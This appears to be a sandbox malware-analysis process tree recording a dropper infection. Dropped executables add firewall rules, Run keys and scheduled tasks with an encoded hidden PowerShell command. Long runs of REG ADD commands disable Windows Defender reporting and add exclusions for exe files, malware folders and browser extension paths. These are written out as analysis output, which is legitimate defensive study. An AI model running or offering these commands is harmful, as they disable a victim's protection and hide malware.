C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:4956
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:1708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:5144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:4596
-
C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5288 -
C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe"C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5276 -
C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe"C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe"2⤵
- Executes dropped EXE
PID:5260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4300
-
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:748 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\60fd73a9-b566-4ebe-bf13-7efa1ba8c839" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:5144 -
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5020 -
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
PID:5204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 5684⤵
- Program crash
PID:1136
-
C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -i1⤵
- Executes dropped EXE
PID:1564
-
C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -s1⤵
- Executes dropped EXE
PID:4092
-
C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe.\Install.exe /iFFhdidlQI "525403" /S1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:3080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5504 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&3⤵PID:5264
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:324⤵PID:2500
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:644⤵PID:5460
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"2⤵PID:3652
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&3⤵PID:5672
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:324⤵PID:5920
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:644⤵PID:5812
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXZzXSySt" /SC once /ST 10:21:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:5164 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXZzXSySt"2⤵PID:3404
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXZzXSySt"2⤵PID:1000
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe\" Fm /zesite_idOIT 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:4836
-
C:\Users\Admin\AppData\Local\Temp\7zS11BE.tmp\Install.exe.\Install.exe1⤵
- Executes dropped EXE
PID:916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 3401⤵
- Program crash
PID:4972
-
C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp"C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp" /SL5="$130200,4078676,54272,C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5260 -ip 52601⤵PID:5836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5204 -ip 52041⤵PID:5424
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b4cb9758,0x7ff8b4cb9768,0x7ff8b4cb97781⤵PID:6032
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:3480
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1740 -ip 17401⤵PID:1416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 956 -ip 9561⤵PID:5008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5024
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2108
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:5064
-
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exeC:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe Fm /zesite_idOIT 525403 /S1⤵PID:2604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5216
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5860
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2936
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1748
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5608
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:6060
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3636
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4492
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5268
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6032
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:996
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:5524
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:323⤵PID:4756
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:324⤵PID:5504
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:643⤵PID:868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:323⤵PID:2540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:643⤵PID:4028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:323⤵PID:5212
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:643⤵PID:5696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:323⤵PID:2948
-
